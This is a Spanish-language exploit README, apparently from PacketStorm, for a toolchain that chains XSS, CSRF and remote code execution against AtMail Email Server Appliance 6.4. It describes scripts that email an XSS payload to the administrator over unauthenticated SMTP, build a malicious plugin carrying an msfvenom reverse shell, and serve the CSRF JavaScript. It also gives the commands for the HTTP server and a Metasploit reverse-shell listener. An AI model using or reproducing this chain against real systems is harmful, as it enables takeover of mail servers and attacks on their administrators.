
AtMail Email Server Appliance 6.4 - Cadena de herramientas de explotación (XSS > CSRF > RCE)
[PacketStorm] [WLB-2020080010]
Descargo de responsabilidad: esta cadena de herramientas de exploit fue inspirada por EDB-ID 20009.
El objetivo de esta cadena de herramientas de exploit es reemplazar EDB-ID 20009.
Ventajas de esta cadena de herramientas sobre el exploit EDB-ID 20009:
Desventajas del exploit EDB-ID 20009:
msfvenom para generación de reverse shell)Instalar requisitos en ArchLinux:
$ sudo pacman -S metasploit tar ruby
Archivos del exploit:
config.yml contiene la configuración de la cadena de herramientasexploit.sh el envoltorio del exploit que debe ejecutarsexss_mail.rb enviará el correo que contiene el XSS al administrador a través del servidor SMTP de Atmail (sin autenticación).csrf_prepare.rb preparará el payload CSRF (estableciendo el objetivo y codificando el archivo del plugin)rce_prepare.rb preparará el RCE (generando la reverse shell y creando el archivo del plugin)csrf_plugin.js el payload CSRF preparadonoraj/ que contiene la arquitectura del plugin sin comprimirLa cadena de herramientas del exploit solo requiere 2 pasos manuales:
config.ymlexploit.shPero antes de lanzar el ataque, un servidor web necesita entregar el archivo JavaScript CSRF y un listener de reverse shell necesita estar esperando la conexión. Así que el ataque se verá más como:
config.ymlcsrf_plugin.jsexploit.shEjemplo de servidor HTTP en una línea:
$ ruby -run -e httpd . -p 8000
Ejemplo de listener de reverse shell:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run